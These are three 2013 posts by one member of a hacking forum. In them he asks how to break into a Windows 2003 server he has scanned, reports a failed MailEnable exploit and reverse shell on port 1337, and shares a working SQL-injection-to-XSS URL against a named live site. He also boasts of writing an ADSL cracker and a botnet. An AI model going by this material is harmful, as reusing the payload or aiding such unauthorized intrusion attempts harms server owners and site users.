Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - firekernel

Pages: [1]
1
Hacking and Security / Re: how can i get access to the server by this services?
« on: August 19, 2013, 06:06:36 pm »
Quote
First thing to do is to be available for help, as you don't seem very open with your problem.
Next thing is too use google.

What exploit did you try for MailEnable? How did it give you the error.

thanks a lot for your replay.
i test this exploit about MailEnable and i changed the port (8080) to 25,143,110 because the MailEnable Service Listen on those ports,not 8080 on the server.
Quote
http://www.exploit-db.com/exploits/952/

and the result was:
Quote
Connect to target Using User (hack) Pass (hack)

but didn't work and i could not connect to server by this user and pass

Quote
OP doesn't seem to have much knowledge about what he's doing, being a desperate skid, but...

That 1337 port of probably a honey pot :D I also don't see any 1337 port in the report you provided, so the connection gets refused because no one is listening on that port (doesn't accept connections)... you seriously need to do your homework.

:
No , You are in mistake , the port 1337 was created when i run the exploit to reverse shell.

Quote
This community is not your personal "how do I hack" helpdesk.
You think posting this in a public place is smart?
And if you have to ask these questions your not ready.

:
Hi Dear Friend I am very sorry about my post, this post is 3'th post on this community and i am not good in English and i think Cause misunderstanding,i am so sorry about this subject that i posted it on a public place , and i want you to guide me that where can i ask my question on this community place,please? :'(

thanks again for other users that replied.





2
Hacking and Security / how can i get access to the server by this services?
« on: August 19, 2013, 12:23:23 pm »
Dear members and masters
i have a problem , i scanned a server by the SuperScan and the result of open ports is:

Code: [Select]
|___    21  File Transfer Protocol [Control]
        |___ 220 Microsoft FTP Service..
    |___    25  Simple Mail Transfer
        |___ 220 WIN-JOPOPIJTO6T.home ESMTP MailEnable Service, Version: 6.57-- ready at 08/19/13 14:32:39..
    |___    53  Domain Name Server
    |___    80  World Wide Web HTTP
        |___ HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 1074608..Content-Type: text/html; charset=utf-8..Server: Microsoft-IIS
    |___   110  Post Office Protocol - Version 3
        |___ +OK Welcome to MailEnable POP3 Server..
    |___   143  Internet Message Access Protocol
        |___ * OK IMAP4rev1 server ready at 08/19/13 14:32:46..

i scanned  it by nmap and it gave me a same result , i tried to exploit server by this services but it didn't work . i tried an exploit to get access by MailEnable service , the result of exploit was :

Code: [Select]
try by nc "target" 1337

but when i tried to connect by nc on port 1337 connection was refused , why?

and i tried all of them , but i couldn't exploit any services that run on the server.

help me please , i have to find any places to get access from the server.

i tried web application too.
the server is windows server 2003 and IIS run on it.the app developed by ASP.net

what should i do ? help me please.have anyone any private exploit ?

3
Hacking and Security / mysql injection convert to XSS
« on: August 18, 2013, 09:29:07 am »
Hi , Dear all Members
i decided to share own experience of hacking and security and black programming,i worked on ashiyane security team but now there is a poor place to KNOWLEDGE,i developed Ashiyane ADSL Cracker And Ananas,Ashiyane ADSL Cracker is a Cracker For ADSL Internet Connections And Ananas is a C&C botnet that you can control your bots from client.

ok , now i find somthing on mysql injection , that you can use union select to XSS attack , so please copy this link on your address bar and test it ... how should improve the attack by this way ...it is interesting.isn't it?.  ;D

Link :
Code: [Select]
http://django.xe0.ru/play.php?gid=-3017%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,%27%3Cscript%3Ealert%28%22helli%22%29%3C/script%3E%27,21,22,23--
and i have many idea about hacking tools and i like work as a team to develop powerful hack tools , if Everyone like share tools and like to team working to develop hack tools , contact me to start.

have good time my FRIENDS.

sorry for my English typing, i know i am not good on English so EXCUSE me

Pages: [1]